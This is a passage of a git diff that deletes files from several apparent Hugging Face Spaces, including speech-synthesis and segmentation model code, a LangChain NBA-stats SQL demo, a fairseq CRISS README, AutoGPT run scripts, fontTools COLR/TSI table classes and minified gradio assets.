window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/kira4424/Tacotron-zero-short-voice-clone/synthesizer/models/sublayer/pre_net.py b/spaces/kira4424/Tacotron-zero-short-voice-clone/synthesizer/models/sublayer/pre_net.py deleted file mode 100644 index 886646a154c68298deeec09dbad736d617f73155..0000000000000000000000000000000000000000 --- a/spaces/kira4424/Tacotron-zero-short-voice-clone/synthesizer/models/sublayer/pre_net.py +++ /dev/null @@ -1,27 +0,0 @@ -import torch.nn as nn -import torch.nn.functional as F - -class PreNet(nn.Module): - def __init__(self, in_dims, fc1_dims=256, fc2_dims=128, dropout=0.5): - super().__init__() - self.fc1 = nn.Linear(in_dims, fc1_dims) - self.fc2 = nn.Linear(fc1_dims, fc2_dims) - self.p = dropout - - def forward(self, x): - """forward - - Args: - x (3D tensor with size `[batch_size, num_chars, tts_embed_dims]`): input texts list - - Returns: - 3D tensor with size `[batch_size, num_chars, encoder_dims]` - - """ - x = self.fc1(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - x = self.fc2(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - return x diff --git a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmseg/models/decode_heads/psa_head.py b/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmseg/models/decode_heads/psa_head.py deleted file mode 100644 index 480dbd1a081262e45bf87e32c4a339ac8f8b4ffb..0000000000000000000000000000000000000000 --- a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmseg/models/decode_heads/psa_head.py +++ /dev/null @@ -1,196 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -from annotator.uniformer.mmcv.cnn import ConvModule - -from annotator.uniformer.mmseg.ops import resize -from ..builder import HEADS -from .decode_head import BaseDecodeHead - -try: - from annotator.uniformer.mmcv.ops import PSAMask -except ModuleNotFoundError: - PSAMask = None - - -@HEADS.register_module() -class PSAHead(BaseDecodeHead): - """Point-wise Spatial Attention Network for Scene Parsing. - - This head is the implementation of `PSANet - `_. - - Args: - mask_size (tuple[int]): The PSA mask size. It usually equals input - size. - psa_type (str): The type of psa module. Options are 'collect', - 'distribute', 'bi-direction'. Default: 'bi-direction' - compact (bool): Whether use compact map for 'collect' mode. - Default: True. - shrink_factor (int): The downsample factors of psa mask. Default: 2. - normalization_factor (float): The normalize factor of attention. - psa_softmax (bool): Whether use softmax for attention. - """ - - def __init__(self, - mask_size, - psa_type='bi-direction', - compact=False, - shrink_factor=2, - normalization_factor=1.0, - psa_softmax=True, - **kwargs): - if PSAMask is None: - raise RuntimeError('Please install mmcv-full for PSAMask ops') - super(PSAHead, self).__init__(**kwargs) - assert psa_type in ['collect', 'distribute', 'bi-direction'] - self.psa_type = psa_type - self.compact = compact - self.shrink_factor = shrink_factor - self.mask_size = mask_size - mask_h, mask_w = mask_size - self.psa_softmax = psa_softmax - if normalization_factor is None: - normalization_factor = mask_h * mask_w - self.normalization_factor = normalization_factor - - self.reduce = ConvModule( - self.in_channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.attention = nn.Sequential( - ConvModule( - self.channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg), - nn.Conv2d( - self.channels, mask_h * mask_w, kernel_size=1, bias=False)) - if psa_type == 'bi-direction': - self.reduce_p = ConvModule( - self.in_channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.attention_p = nn.Sequential( - ConvModule( - self.channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg), - nn.Conv2d( - self.channels, mask_h * mask_w, kernel_size=1, bias=False)) - self.psamask_collect = PSAMask('collect', mask_size) - self.psamask_distribute = PSAMask('distribute', mask_size) - else: - self.psamask = PSAMask(psa_type, mask_size) - self.proj = ConvModule( - self.channels * (2 if psa_type == 'bi-direction' else 1), - self.in_channels, - kernel_size=1, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.bottleneck = ConvModule( - self.in_channels * 2, - self.channels, - kernel_size=3, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, inputs): - """Forward function.""" - x = self._transform_inputs(inputs) - identity = x - align_corners = self.align_corners - if self.psa_type in ['collect', 'distribute']: - out = self.reduce(x) - n, c, h, w = out.size() - if self.shrink_factor != 1: - if h % self.shrink_factor and w % self.shrink_factor: - h = (h - 1) // self.shrink_factor + 1 - w = (w - 1) // self.shrink_factor + 1 - align_corners = True - else: - h = h // self.shrink_factor - w = w // self.shrink_factor - align_corners = False - out = resize( - out, - size=(h, w), - mode='bilinear', - align_corners=align_corners) - y = self.attention(out) - if self.compact: - if self.psa_type == 'collect': - y = y.view(n, h * w, - h * w).transpose(1, 2).view(n, h * w, h, w) - else: - y = self.psamask(y) - if self.psa_softmax: - y = F.softmax(y, dim=1) - out = torch.bmm( - out.view(n, c, h * w), y.view(n, h * w, h * w)).view( - n, c, h, w) * (1.0 / self.normalization_factor) - else: - x_col = self.reduce(x) - x_dis = self.reduce_p(x) - n, c, h, w = x_col.size() - if self.shrink_factor != 1: - if h % self.shrink_factor and w % self.shrink_factor: - h = (h - 1) // self.shrink_factor + 1 - w = (w - 1) // self.shrink_factor + 1 - align_corners = True - else: - h = h // self.shrink_factor - w = w // self.shrink_factor - align_corners = False - x_col = resize( - x_col, - size=(h, w), - mode='bilinear', - align_corners=align_corners) - x_dis = resize( - x_dis, - size=(h, w), - mode='bilinear', - align_corners=align_corners) - y_col = self.attention(x_col) - y_dis = self.attention_p(x_dis) - if self.compact: - y_dis = y_dis.view(n, h * w, - h * w).transpose(1, 2).view(n, h * w, h, w) - else: - y_col = self.psamask_collect(y_col) - y_dis = self.psamask_distribute(y_dis) - if self.psa_softmax: - y_col = F.softmax(y_col, dim=1) - y_dis = F.softmax(y_dis, dim=1) - x_col = torch.bmm( - x_col.view(n, c, h * w), y_col.view(n, h * w, h * w)).view( - n, c, h, w) * (1.0 / self.normalization_factor) - x_dis = torch.bmm( - x_dis.view(n, c, h * w), y_dis.view(n, h * w, h * w)).view( - n, c, h, w) * (1.0 / self.normalization_factor) - out = torch.cat([x_col, x_dis], 1) - out = self.proj(out) - out = resize( - out, - size=identity.shape[2:], - mode='bilinear', - align_corners=align_corners) - out = self.bottleneck(torch.cat((identity, out), dim=1)) - out = self.cls_seg(out) - return out diff --git a/spaces/kmirijan/NBA-Stats/app.py b/spaces/kmirijan/NBA-Stats/app.py deleted file mode 100644 index 57962f1292548ecb2a9dfa763aa1ae7ece5fbe3d..0000000000000000000000000000000000000000 --- a/spaces/kmirijan/NBA-Stats/app.py +++ /dev/null @@ -1,112 +0,0 @@ -from langchain import SQLDatabaseChain -from langchain.sql_database import SQLDatabase -from langchain.llms.openai import OpenAI -from langchain.chat_models import ChatOpenAI -from langchain.prompts.prompt import PromptTemplate - -llm = ChatOpenAI(temperature=0, model_name="gpt-3.5-turbo", verbose=True) - -DEFAULT_TABLES = [ - 'Active Players', - 'Team_Per_Game_Statistics_2022_23', - "Team_Totals_Statistics_2022_23", - "Player_Total_Statistics_2022_23", - "Player_Per_Game_Statistics_2022_23" -] - -def get_prompt(): - _DEFAULT_TEMPLATE = """Given an input question, first create a syntactically correct {dialect} query to run, then look at the results of the query and return the answer. - Use the following format: - - Question: "Question here" - SQLQuery: "SQL Query to run" - SQLResult: "Result of the SQLQuery" - - Answer: "Final answer here" - - Only use the following tables: - - {table_info} - - Question: {input}""" - - PROMPT = PromptTemplate( - input_variables=["input", "table_info", "dialect"], template=_DEFAULT_TEMPLATE - ) - return PROMPT - -def check_query(query): - if query.startswith("### Query"): - split = query.split('\n\n') - q_text = split[0] - t_text = split[1] - - if t_text.startswith("### Tables"): - query_params = dict() - tables = t_text.split('\n') - query_params['tables'] = tables[1:] - query_params['q'] = q_text.split('\n')[1] - print(query_params) - return query_params - else: - return 'error' - return 'small' - -def get_db(q, tables): - if len(tables) == 0: - db = SQLDatabase.from_uri("sqlite:///nba_small.db", - sample_rows_in_table_info=2) - else: - tables.extend(DEFAULT_TABLES) - db = SQLDatabase.from_uri("sqlite:///nba.db", - include_tables = tables, - sample_rows_in_table_info=2) - return db -def answer_question(query): - PROMPT = get_prompt() - query_check = check_query(query) - if query_check == 'error': - return('ERROR: Wrong format for getting the big db schema') - if isinstance(query_check, dict): - q = query_check['q'] - tables = query_check['tables'] - if query_check == 'small': - q = query - tables = [] - db = get_db(q, tables) - - db_chain = SQLDatabaseChain.from_llm(llm, db, - prompt=PROMPT, - verbose=True, - return_intermediate_steps=True, - # use_query_checker=True - ) - result = db_chain(q) - return result['result'] - -if __name__ == "__main__": - import gradio as gr - # print(answer_question("Who is Harry's Father")) - - gr.Interface( - answer_question, - [ - gr.inputs.Textbox(lines=10, label="Query"), - ], - gr.outputs.Textbox(label="Response"), - title="Ask NBA Stats", - description=""" Ask NBA Stats is a tool that let's you ask a question with - the NBA SQL tables as a reference - - Ask a simple question to use the small database - - If you would like to access the large DB use format - - ### Query - single line query - - ### Tables - tables to access line by line - table1 - table2""" - ).launch() \ No newline at end of file diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/criss/README.md b/spaces/koajoel/PolyFormer/fairseq/examples/criss/README.md deleted file mode 100644 index 4689ed7c10497a5100b28fe6d6801a7c089da569..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/criss/README.md +++ /dev/null @@ -1,61 +0,0 @@ -# Cross-lingual Retrieval for Iterative Self-Supervised Training - -https://arxiv.org/pdf/2006.09526.pdf - -## Introduction - -CRISS is a multilingual sequence-to-sequnce pretraining method where mining and training processes are applied iteratively, improving cross-lingual alignment and translation ability at the same time. - -## Requirements: - -* faiss: https://github.com/facebookresearch/faiss -* mosesdecoder: https://github.com/moses-smt/mosesdecoder -* flores: https://github.com/facebookresearch/flores -* LASER: https://github.com/facebookresearch/LASER - -## Unsupervised Machine Translation -##### 1. Download and decompress CRISS checkpoints -``` -cd examples/criss -wget https://dl.fbaipublicfiles.com/criss/criss_3rd_checkpoints.tar.gz -tar -xf criss_checkpoints.tar.gz -``` -##### 2. Download and preprocess Flores test dataset -Make sure to run all scripts from examples/criss directory -``` -bash download_and_preprocess_flores_test.sh -``` - -##### 3. Run Evaluation on Sinhala-English -``` -bash unsupervised_mt/eval.sh -``` - -## Sentence Retrieval -##### 1. Download and preprocess Tatoeba dataset -``` -bash download_and_preprocess_tatoeba.sh -``` - -##### 2. Run Sentence Retrieval on Tatoeba Kazakh-English -``` -bash sentence_retrieval/sentence_retrieval_tatoeba.sh -``` - -## Mining -##### 1. Install faiss -Follow instructions on https://github.com/facebookresearch/faiss/blob/master/INSTALL.md -##### 2. Mine pseudo-parallel data between Kazakh and English -``` -bash mining/mine_example.sh -``` - -## Citation -```bibtex -@article{tran2020cross, - title={Cross-lingual retrieval for iterative self-supervised training}, - author={Tran, Chau and Tang, Yuqing and Li, Xian and Gu, Jiatao}, - journal={arXiv preprint arXiv:2006.09526}, - year={2020} -} -``` diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/hubert/simple_kmeans/dump_w2v2_feature.py b/spaces/koajoel/PolyFormer/fairseq/examples/hubert/simple_kmeans/dump_w2v2_feature.py deleted file mode 100644 index a1f0d902acf0756580a1f4604feee8fc499a9a63..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/hubert/simple_kmeans/dump_w2v2_feature.py +++ /dev/null @@ -1,95 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -import sys - -import fairseq -import soundfile as sf -import torch -import torch.nn.functional as F - -from feature_utils import get_path_iterator, dump_feature - - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("dump_w2v2_feature") - - -class Wav2Vec2FeatureReader(object): - def __init__(self, ckpt_path, layer, max_chunk=1600000): - ( - model, - cfg, - task, - ) = fairseq.checkpoint_utils.load_model_ensemble_and_task([ckpt_path]) - self.model = model[0].eval().cuda() - self.task = task - self.layer = layer # assume this is 1-based like HuBERT - self.max_chunk = max_chunk - logger.info(f"TASK CONFIG:\n{self.task.cfg}") - logger.info(f" max_chunk = {self.max_chunk}") - logger.info(f" model:\n{self.model}") - - def read_audio(self, path, ref_len=None): - wav, sr = sf.read(path) - assert sr == self.task.cfg.sample_rate, sr - if wav.ndim == 2: - wav = wav.mean(-1) - assert wav.ndim == 1, wav.ndim - if ref_len is not None and abs(ref_len - len(wav)) > 160: - logging.warning(f"ref {ref_len} != read {len(wav)} ({path})") - return wav - - def get_feats(self, path, ref_len=None): - x = self.read_audio(path, ref_len) - with torch.no_grad(): - x = torch.from_numpy(x).float().cuda() - if self.task.cfg.normalize: - x = F.layer_norm(x, x.shape) - x = x.view(1, -1) - - feat = [] - for start in range(0, x.size(1), self.max_chunk): - x_chunk = x[:, start: start + self.max_chunk] - res = self.model.extract_features( - source=x_chunk, - padding_mask=None, - mask=False, - layer=self.layer - 1, - ) - feat_chunk = res["x"] - feat.append(feat_chunk) - return torch.cat(feat, 1).squeeze(0) - - -def main(tsv_dir, split, ckpt_path, layer, nshard, rank, feat_dir, max_chunk): - reader = Wav2Vec2FeatureReader(ckpt_path, layer, max_chunk) - generator, num = get_path_iterator(f"{tsv_dir}/{split}.tsv", nshard, rank) - dump_feature(reader, generator, num, split, nshard, rank, feat_dir) - - -if __name__ == "__main__": - import argparse - - parser = argparse.ArgumentParser() - parser.add_argument("tsv_dir") - parser.add_argument("split") - parser.add_argument("ckpt_path") - parser.add_argument("layer", type=int) - parser.add_argument("nshard", type=int) - parser.add_argument("rank", type=int) - parser.add_argument("feat_dir") - parser.add_argument("--max_chunk", type=int, default=1600000) - args = parser.parse_args() - logger.info(args) - - main(**vars(args)) diff --git a/spaces/kokofixcomputers/chat-ui/src/routes/conversation/+server.ts b/spaces/kokofixcomputers/chat-ui/src/routes/conversation/+server.ts deleted file mode 100644 index fbf6034f90b4ac27b7ae9c41b69e8c8516252556..0000000000000000000000000000000000000000 --- a/spaces/kokofixcomputers/chat-ui/src/routes/conversation/+server.ts +++ /dev/null @@ -1,61 +0,0 @@ -import type { RequestHandler } from "./$types"; -import { collections } from "$lib/server/database"; -import { ObjectId } from "mongodb"; -import { error, redirect } from "@sveltejs/kit"; -import { base } from "$app/paths"; -import { z } from "zod"; -import type { Message } from "$lib/types/Message"; -import { models, validateModel } from "$lib/server/models"; -import { authCondition } from "$lib/server/auth"; - -export const POST: RequestHandler = async ({ locals, request }) => { - const body = await request.text(); - - let title = ""; - let messages: Message[] = []; - - const values = z - .object({ - fromShare: z.string().optional(), - model: validateModel(models), - }) - .parse(JSON.parse(body)); - - if (values.fromShare) { - const conversation = await collections.sharedConversations.findOne({ - _id: values.fromShare, - }); - - if (!conversation) { - throw error(404, "Conversation not found"); - } - - title = conversation.title; - messages = conversation.messages; - values.model = conversation.model; - } - - const res = await collections.conversations.insertOne({ - _id: new ObjectId(), - title: - title || - "Untitled " + ((await collections.conversations.countDocuments(authCondition(locals))) + 1), - messages, - model: values.model, - createdAt: new Date(), - updatedAt: new Date(), - ...(locals.user ? { userId: locals.user._id } : { sessionId: locals.sessionId }), - ...(values.fromShare ? { meta: { fromShareId: values.fromShare } } : {}), - }); - - return new Response( - JSON.stringify({ - conversationId: res.insertedId.toString(), - }), - { headers: { "Content-Type": "application/json" } } - ); -}; - -export const GET: RequestHandler = async () => { - throw redirect(302, `${base}/`); -}; diff --git a/spaces/kquote03/lama-video-watermark-remover/saicinpainting/training/data/aug.py b/spaces/kquote03/lama-video-watermark-remover/saicinpainting/training/data/aug.py deleted file mode 100644 index b1246250924e79511b58cd3d7ab79de8012f8949..0000000000000000000000000000000000000000 --- a/spaces/kquote03/lama-video-watermark-remover/saicinpainting/training/data/aug.py +++ /dev/null @@ -1,84 +0,0 @@ -from albumentations import DualIAATransform, to_tuple -import imgaug.augmenters as iaa - -class IAAAffine2(DualIAATransform): - """Place a regular grid of points on the input and randomly move the neighbourhood of these point around - via affine transformations. - - Note: This class introduce interpolation artifacts to mask if it has values other than {0;1} - - Args: - p (float): probability of applying the transform. Default: 0.5. - - Targets: - image, mask - """ - - def __init__( - self, - scale=(0.7, 1.3), - translate_percent=None, - translate_px=None, - rotate=0.0, - shear=(-0.1, 0.1), - order=1, - cval=0, - mode="reflect", - always_apply=False, - p=0.5, - ): - super(IAAAffine2, self).__init__(always_apply, p) - self.scale = dict(x=scale, y=scale) - self.translate_percent = to_tuple(translate_percent, 0) - self.translate_px = to_tuple(translate_px, 0) - self.rotate = to_tuple(rotate) - self.shear = dict(x=shear, y=shear) - self.order = order - self.cval = cval - self.mode = mode - - @property - def processor(self): - return iaa.Affine( - self.scale, - self.translate_percent, - self.translate_px, - self.rotate, - self.shear, - self.order, - self.cval, - self.mode, - ) - - def get_transform_init_args_names(self): - return ("scale", "translate_percent", "translate_px", "rotate", "shear", "order", "cval", "mode") - - -class IAAPerspective2(DualIAATransform): - """Perform a random four point perspective transform of the input. - - Note: This class introduce interpolation artifacts to mask if it has values other than {0;1} - - Args: - scale ((float, float): standard deviation of the normal distributions. These are used to sample - the random distances of the subimage's corners from the full image's corners. Default: (0.05, 0.1). - p (float): probability of applying the transform. Default: 0.5. - - Targets: - image, mask - """ - - def __init__(self, scale=(0.05, 0.1), keep_size=True, always_apply=False, p=0.5, - order=1, cval=0, mode="replicate"): - super(IAAPerspective2, self).__init__(always_apply, p) - self.scale = to_tuple(scale, 1.0) - self.keep_size = keep_size - self.cval = cval - self.mode = mode - - @property - def processor(self): - return iaa.PerspectiveTransform(self.scale, keep_size=self.keep_size, mode=self.mode, cval=self.cval) - - def get_transform_init_args_names(self): - return ("scale", "keep_size") diff --git a/spaces/kukuhtw/AutoGPT/run_continuous.bat b/spaces/kukuhtw/AutoGPT/run_continuous.bat deleted file mode 100644 index 812aa01c1c5506c452665610c0e9e83a17c426f2..0000000000000000000000000000000000000000 --- a/spaces/kukuhtw/AutoGPT/run_continuous.bat +++ /dev/null @@ -1,3 +0,0 @@ -@echo off -set argument=--continuous -call run.bat %argument% diff --git a/spaces/kukuhtw/AutoGPT/run_continuous.sh b/spaces/kukuhtw/AutoGPT/run_continuous.sh deleted file mode 100644 index 1f4436c88503172c0578b15a8447ed8268502578..0000000000000000000000000000000000000000 --- a/spaces/kukuhtw/AutoGPT/run_continuous.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -./run.sh --continuous $@ diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/C_O_L_R_.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/C_O_L_R_.py deleted file mode 100644 index b4bc5d0c200e58f793fff6d3ffe95b2d76d36c64..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/C_O_L_R_.py +++ /dev/null @@ -1,158 +0,0 @@ -# Copyright 2013 Google, Inc. All Rights Reserved. -# -# Google Author(s): Behdad Esfahbod - -from fontTools.misc.textTools import safeEval -from . import DefaultTable - - -class table_C_O_L_R_(DefaultTable.DefaultTable): - - """This table is structured so that you can treat it like a dictionary keyed by glyph name. - - ``ttFont['COLR'][]`` will return the color layers for any glyph. - - ``ttFont['COLR'][] = `` will set the color layers for any glyph. - """ - - @staticmethod - def _decompileColorLayersV0(table): - if not table.LayerRecordArray: - return {} - colorLayerLists = {} - layerRecords = table.LayerRecordArray.LayerRecord - numLayerRecords = len(layerRecords) - for baseRec in table.BaseGlyphRecordArray.BaseGlyphRecord: - baseGlyph = baseRec.BaseGlyph - firstLayerIndex = baseRec.FirstLayerIndex - numLayers = baseRec.NumLayers - assert firstLayerIndex + numLayers <= numLayerRecords - layers = [] - for i in range(firstLayerIndex, firstLayerIndex + numLayers): - layerRec = layerRecords[i] - layers.append(LayerRecord(layerRec.LayerGlyph, layerRec.PaletteIndex)) - colorLayerLists[baseGlyph] = layers - return colorLayerLists - - def _toOTTable(self, ttFont): - from . import otTables - from fontTools.colorLib.builder import populateCOLRv0 - - tableClass = getattr(otTables, self.tableTag) - table = tableClass() - table.Version = self.version - - populateCOLRv0( - table, - { - baseGlyph: [(layer.name, layer.colorID) for layer in layers] - for baseGlyph, layers in self.ColorLayers.items() - }, - glyphMap=ttFont.getReverseGlyphMap(rebuild=True), - ) - return table - - def decompile(self, data, ttFont): - from .otBase import OTTableReader - from . import otTables - - # We use otData to decompile, but we adapt the decompiled otTables to the - # existing COLR v0 API for backward compatibility. - reader = OTTableReader(data, tableTag=self.tableTag) - tableClass = getattr(otTables, self.tableTag) - table = tableClass() - table.decompile(reader, ttFont) - - self.version = table.Version - if self.version == 0: - self.ColorLayers = self._decompileColorLayersV0(table) - else: - # for new versions, keep the raw otTables around - self.table = table - - def compile(self, ttFont): - from .otBase import OTTableWriter - - if hasattr(self, "table"): - table = self.table - else: - table = self._toOTTable(ttFont) - - writer = OTTableWriter(tableTag=self.tableTag) - table.compile(writer, ttFont) - return writer.getAllData() - - def toXML(self, writer, ttFont): - if hasattr(self, "table"): - self.table.toXML2(writer, ttFont) - else: - writer.simpletag("version", value=self.version) - writer.newline() - for baseGlyph in sorted(self.ColorLayers.keys(), key=ttFont.getGlyphID): - writer.begintag("ColorGlyph", name=baseGlyph) - writer.newline() - for layer in self.ColorLayers[baseGlyph]: - layer.toXML(writer, ttFont) - writer.endtag("ColorGlyph") - writer.newline() - - def fromXML(self, name, attrs, content, ttFont): - if name == "version": # old COLR v0 API - setattr(self, name, safeEval(attrs["value"])) - elif name == "ColorGlyph": - if not hasattr(self, "ColorLayers"): - self.ColorLayers = {} - glyphName = attrs["name"] - for element in content: - if isinstance(element, str): - continue - layers = [] - for element in content: - if isinstance(element, str): - continue - layer = LayerRecord() - layer.fromXML(element[0], element[1], element[2], ttFont) - layers.append(layer) - self.ColorLayers[glyphName] = layers - else: # new COLR v1 API - from . import otTables - - if not hasattr(self, "table"): - tableClass = getattr(otTables, self.tableTag) - self.table = tableClass() - self.table.fromXML(name, attrs, content, ttFont) - self.table.populateDefaults() - self.version = self.table.Version - - def __getitem__(self, glyphName): - if not isinstance(glyphName, str): - raise TypeError(f"expected str, found {type(glyphName).__name__}") - return self.ColorLayers[glyphName] - - def __setitem__(self, glyphName, value): - if not isinstance(glyphName, str): - raise TypeError(f"expected str, found {type(glyphName).__name__}") - if value is not None: - self.ColorLayers[glyphName] = value - elif glyphName in self.ColorLayers: - del self.ColorLayers[glyphName] - - def __delitem__(self, glyphName): - del self.ColorLayers[glyphName] - - -class LayerRecord(object): - def __init__(self, name=None, colorID=None): - self.name = name - self.colorID = colorID - - def toXML(self, writer, ttFont): - writer.simpletag("layer", name=self.name, colorID=self.colorID) - writer.newline() - - def fromXML(self, eltname, attrs, content, ttFont): - for (name, value) in attrs.items(): - if name == "name": - setattr(self, name, value) - else: - setattr(self, name, safeEval(value)) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/T_S_I__2.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/T_S_I__2.py deleted file mode 100644 index 43a17f6f1ffa82cd803a44ab61832c99259c9ea9..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/T_S_I__2.py +++ /dev/null @@ -1,15 +0,0 @@ -""" TSI{0,1,2,3,5} are private tables used by Microsoft Visual TrueType (VTT) -tool to store its hinting source data. - -TSI2 is the index table containing the lengths and offsets for the glyph -programs that are contained in the TSI3 table. It uses the same format as -the TSI0 table. -""" -from fontTools import ttLib - -superclass = ttLib.getTableClass("TSI0") - - -class table_T_S_I__2(superclass): - - dependencies = ["TSI3"] diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/Model3D-98fc2b2c.css b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/Model3D-98fc2b2c.css deleted file mode 100644 index cee82ea831d77ca0e001baf10a07f84e176679f0..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/Model3D-98fc2b2c.css +++ /dev/null @@ -1 +0,0 @@ -.gallery.svelte-1ayixqk{padding:var(--size-1) var(--size-2)} diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-9923ca49.js b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-9923ca49.js deleted file mode 100644 index c103808bae5bfdeb5848190940debc7c7a69dd59..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-9923ca49.js +++ /dev/null @@ -1,2 +0,0 @@ -import{C as ge,E as q,L as Pe}from"./index-0c011c1e.js";import{s as Te,t as S,p as be,L as Ve,i as xe,f as _e,u as ye,b as ve,v as qe,h as z,E as G}from"./index-90411bc1.js";import{cssLanguage as F,css as $e}from"./index-66e01a03.js";import{typescriptLanguage as we,jsxLanguage as Ce,tsxLanguage as Qe,javascriptLanguage as K,javascript as Ae}from"./index-72f11de8.js";import"./index-7c0e54a6.js";import"./Blocks-61158678.js";import"./Button-661a0701.js";import"./BlockLabel-95be8dd1.js";import"./Empty-96265974.js";/* empty css */import"./Copy-c4997e4e.js";import"./Download-e5de98da.js";const Xe=54,ke=1,Ye=55,Me=2,Be=56,Ee=3,D=4,Ge=5,y=6,ee=7,te=8,ae=9,le=10,De=11,Re=12,Ze=13,w=57,Ne=14,R=58,We=20,He=22,re=23,Ie=24,k=26,ne=27,Ue=28,je=31,Je=34,se=36,Le=37,ze=0,Fe=1,Ke={area:!0,base:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0,menuitem:!0},et={dd:!0,li:!0,optgroup:!0,option:!0,p:!0,rp:!0,rt:!0,tbody:!0,td:!0,tfoot:!0,th:!0,tr:!0},Z={dd:{dd:!0,dt:!0},dt:{dd:!0,dt:!0},li:{li:!0},option:{option:!0,optgroup:!0},optgroup:{optgroup:!0},p:{address:!0,article:!0,aside:!0,blockquote:!0,dir:!0,div:!0,dl:!0,fieldset:!0,footer:!0,form:!0,h1:!0,h2:!0,h3:!0,h4:!0,h5:!0,h6:!0,header:!0,hgroup:!0,hr:!0,menu:!0,nav:!0,ol:!0,p:!0,pre:!0,section:!0,table:!0,ul:!0},rp:{rp:!0,rt:!0},rt:{rp:!0,rt:!0},tbody:{tbody:!0,tfoot:!0},td:{td:!0,th:!0},tfoot:{tbody:!0},th:{td:!0,th:!0},thead:{tbody:!0,tfoot:!0},tr:{tr:!0}};function tt(e){return e==45||e==46||e==58||e>=65&&e<=90||e==95||e>=97&&e<=122||e>=161}function oe(e){return e==9||e==10||e==13||e==32}let N=null,W=null,H=0;function Y(e,t){let l=e.pos+t;if(H==l&&W==e)return N;let a=e.peek(t);for(;oe(a);)a=e.peek(++t);let r="";for(;tt(a);)r+=String.fromCharCode(a),a=e.peek(++t);return W=e,H=l,N=r?r.toLowerCase():a==at||a==lt?void 0:null}const Oe=60,v=62,M=47,at=63,lt=33,rt=45;function I(e,t){this.name=e,this.parent=t,this.hash=t?t.hash:0;for(let l=0;l-1?new I(Y(a,1)||"",e):e},reduce(e,t){return t==We&&e?e.parent:e},reuse(e,t,l,a){let r=t.type.id;return r==y||r==se?new I(Y(a,1)||"",e):e},hash(e){return e?e.hash:0},strict:!1}),ot=new q((e,t)=>{if(e.next!=Oe){e.next<0&&t.context&&e.acceptToken(w);return}e.advance();let l=e.next==M;l&&e.advance();let a=Y(e,0);if(a===void 0)return;if(!a)return e.acceptToken(l?Ne:y);let r=t.context?t.context.name:null;if(l){if(a==r)return e.acceptToken(De);if(r&&et[r])return e.acceptToken(w,-2);if(t.dialectEnabled(ze))return e.acceptToken(Re);for(let n=t.context;n;n=n.parent)if(n.name==a)return;e.acceptToken(Ze)}else{if(a=="script")return e.acceptToken(ee);if(a=="style")return e.acceptToken(te);if(a=="textarea")return e.acceptToken(ae);if(Ke.hasOwnProperty(a))return e.acceptToken(le);r&&Z[r]&&Z[r][a]?e.acceptToken(w,-1):e.acceptToken(y)}},{contextual:!0}),Ot=new q(e=>{for(let t=0,l=0;;l++){if(e.next<0){l&&e.acceptToken(R);break}if(e.next==rt)t++;else if(e.next==v&&t>=2){l>3&&e.acceptToken(R,-2);break}else t=0;e.advance()}});function it(e){for(;e;e=e.parent)if(e.name=="svg"||e.name=="math")return!0;return!1}const ut=new q((e,t)=>{if(e.next==M&&e.peek(1)==v){let 